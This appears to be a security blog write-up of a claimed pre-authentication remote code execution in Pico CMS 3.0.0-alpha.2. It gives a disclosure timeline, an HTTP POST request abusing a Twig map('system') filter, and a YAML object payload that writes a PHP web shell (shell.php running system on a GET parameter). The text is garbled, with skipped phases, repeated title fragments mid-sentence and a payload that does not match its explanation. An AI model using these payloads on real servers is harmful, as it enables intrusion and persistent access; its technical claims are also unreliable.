Pico 3.0.0-alpha.2 Exploit

Breaking Down the Pico 3.0.0-alpha.2 Exploit: A Deep Dive into the Pre-Auth Remote Code Execution

Published: April 21, 2026 Author: Security Research Team

The Ethical Disclosure Timeline

To understand how this exploit evolved, review the timeline:

• January 2024: Pico 3.0.0-alpha.2 released on GitHub.
• February 2024: Independent researcher "HackTheBox" user submits a private bug report to the Pico team detailing the map('system') vector.
• March 2024: The Pico team acknowledges the issue and patches SandboxExtension.php in the development branch.
• April 2024: The exploit is publicly disclosed on Exploit-DB (EDB-ID: 52001) after a 30-day responsible disclosure window.
• Current status: No active CVE exists because the vendor classifies alpha versions as "unsupported."

Phase 2: Twig Sandbox Escape (The Core Exploit)

In a secure Pico installation, Twig templates are sandboxed to prevent _self.env.registerUndefinedFilterCallback("exec") style attacks. However, in alpha.2, the allowed_functions blacklist was incomplete.

The Exploit Payload: An attacker submits a crafted HTTP POST request to the theme preview endpoint (which does not require authentication in alpha builds): Pico 3.0.0-alpha.2 Exploit

POST /?action=preview_theme HTTP/1.1
Host: target-site.com
Content-Type: application/x-www-form-urlencoded
theme_template=shell&content=map('system')

Why this works:

• The map filter in Twig applies a function to every element of an array.
• Because 'system' was not explicitly blocked in the $config['twig_config']['sandbox']['functions'] whitelist, the template engine executes system('id'), system('whoami'), etc.
• The output is rendered directly into the HTTP response.

The Vulnerability: Where Theory Meets Reality

The root cause lies in a dangerous combination of two features introduced in the alpha branch: Twig template caching and YAML parameter parsing.

Step 4: Full Shell

A more advanced payload replaces the system call with a full PHP reverse shell or a web-based file manager.

!php/object "O:1:\"S\":1:s:4:\"exec\";s:62:\"file_put_contents('shell.php','<?php system($_GET[\"cmd\"]); ?>')\";"

Once shell.php is written, the attacker has permanent access. Breaking Down the Pico 3

Real-World Impact Assessment

While Pico 3.0.0-alpha.2 is not designed for high-traffic public sites, the exploit has been observed in the wild targeting:

1. Developer Staging Servers: Developers often expose alpha versions on public IPs for client demos. Attackers scan for /admin and specific X-Generator headers.
2. Docker Containers: Many hobbyists pulled pico/pico:3.0.0-alpha.2 from Docker Hub, believing the "latest" tag would be stable.
3. CTF (Capture The Flag) Challenges: Ironically, this exploit is now a standard challenge in cybersecurity training, teaching students about insecure deserialization and sandbox escapes.

If successfully exploited, an attacker can:

• Read database credentials (if any external DB is connected).
• Deface the website (rewrite Markdown files).
• Use the server as a bot in a DDoS network.
• Pivot to internal network resources.